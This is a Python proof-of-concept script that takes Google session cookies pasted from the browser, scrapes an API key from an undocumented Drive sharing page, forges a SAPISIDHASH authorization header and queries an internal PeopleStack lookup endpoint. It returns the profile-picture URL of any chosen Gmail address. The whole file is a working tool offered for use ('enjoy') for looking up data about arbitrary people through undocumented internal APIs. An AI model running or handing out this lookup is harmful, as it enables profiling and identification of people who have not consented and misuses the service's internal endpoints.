# PoC of getting the profile picture of any gmail address
# go into developer settings => storage => cookies
# paste cookies
# set EMAIL to the email address that you want to look up
# enjoy
import hashlib
import json
import os
import time
from typing import Optional

import requests
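# Address whose picture is looked up; can be overridden via LOOKUP_EMAIL.
EMAIL = os.environ.get("LOOKUP_EMAIL", "[email protected]")
# Google session cookies copied from the browser. They are bearer credentials
# for the whole signed-in session, so keep real values out of version control:
# the environment variables below (names are this script's own) take precedence
# over the placeholder literals.
cookies = {
    "SID": os.environ.get("GOOGLE_SID", "xxx"),  # cookie
    "APISID": os.environ.get("GOOGLE_APISID", "xxx/xxx"),  # cookie
    "SAPISID": os.environ.get("GOOGLE_SAPISID", "xxx/xxx"),  # cookie
    "HSID": os.environ.get("GOOGLE_HSID", "xxx"),  # HTTP only cookie
    "SSID": os.environ.get("GOOGLE_SSID", "xxx"),  # HTTP only cookie
}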
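def getAPIKey(cookies: dict) -> str:
    """Fetch the client API key embedded in the Drive sharing page.

    The key is scraped from the body of the ``driveshare`` endpoint, which
    only needs the SID, HSID and SSID cookies. APISID and SAPISID are
    stripped from a copy before the request so no more credential material
    than necessary is sent.

    Args:
        cookies: Full session cookie dict; it is not modified.

    Returns:
        The API key string found in the page.

    Raises:
        SystemExit: If the key cannot be located in the response. Without it
            the lookup request cannot be made, so the script stops (exit 1).
    """
    # Undocumented endpoint; nothing public describes it.
    url = "https://docs.google.com/sharing/driveshare?authuser=0"
    # Shallow copy (values are plain strings) so the caller's dict keeps the
    # APISID/SAPISID entries needed by the later lookup request.
    tmp = dict(cookies)
    tmp.pop("APISID", None)
    tmp.pop("SAPISID", None)
    r = requests.get(url, cookies=tmp)
    # The key follows the literal sequence `v2internal\",\"` in the body and
    # runs up to the next backslash. A body without that marker (e.g. an
    # expired session) yields a single-element split, hence the IndexError.
    try:
        return r.text.split("v2internal\\\",\\\"")[1].split("\\")[0]
    except IndexError:
        print("Couldn't get the API key")
        # NOTE: the raw body is echoed for debugging; it was produced for this
        # session's cookies, so avoid pasting it into shared bug reports.
        print("Response: " + r.text)
        print("Error getting API key")
        # No API key - no reason to continue.
        raise SystemExit(1)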
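def getProfilePic(key: str, cookies: dict, email: str) -> Optional[str]:
    """Look up the profile-picture URL Google returns for *email*.

    Sends one POST to the PeopleStack autocomplete "Lookup" RPC with all
    five cookies (SID, HSID, SSID, APISID, SAPISID) and a SAPISIDHASH
    Authorization header derived from the SAPISID cookie.

    Args:
        key: API key obtained from getAPIKey().
        cookies: Session cookie dict; every entry is sent on this request.
        email: Address to look up.

    Returns:
        The picture URL on success, or None if the response did not have the
        expected shape (the raw body is printed for debugging).
    """
    # Current unix time; it is both hashed and echoed in the header.
    ct = str(int(time.time()))
    # SAPISIDHASH = sha1("<time> <SAPISID> <origin>"), see
    # https://stackoverflow.com/questions/16907352/reverse-engineering-javascript-behind-google-button
    origin = "https://docs.google.com"
    sidh = hashlib.sha1(" ".join([ct, cookies["SAPISID"], origin]).encode()).hexdigest()
    # The request won't work if ANY of these headers is missing.
    headers = {
        "Authorization": f"SAPISIDHASH {ct}_{sidh}",
        "Content-Type": "application/json+protobuf",
        "Origin": origin,
        "X-Goog-Api-Key": key,
    }
    # Request body: the first value has to be 58; the second can be anything,
    # even empty, but it has to exist. Built with json.dumps so quotes or
    # backslashes in *email* are escaped rather than breaking the array; the
    # compact separators keep the bytes identical to the hand-built form.
    data = json.dumps([58, [], [[email]]], separators=(",", ":"), ensure_ascii=False)
    # Undocumented endpoint; the only description found is
    # https://gist.github.com/avaidyam/acd66c26bc68bf6b89e70374bdc5a5d4
    url = "https://peoplestack-pa.clients6.google.com/$rpc/peoplestack.PeopleStackAutocompleteService/Lookup"
    r = requests.post(url, headers=headers, cookies=cookies, data=data)
    try:
        # Deeply nested positional response; a non-JSON body, a shorter list
        # or a null in the chain all land in the except below.
        em = r.json()[0][0][1][0][0][0][0][0][0]
    except (ValueError, IndexError, KeyError, TypeError):
        print(r.text)
        print("Error getting pfp")
        return None
    print(f"[*] Successfully got the profile picture of {email} ")
    print(em)
    return em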
if __name__ == "__main__":
    # Two-step flow: scrape the API key first, then run the lookup with it.
    api_key = getAPIKey(cookies)
    print(f"[*] Successfully got the API key ({api_key})")
    getProfilePic(api_key, cookies, EMAIL)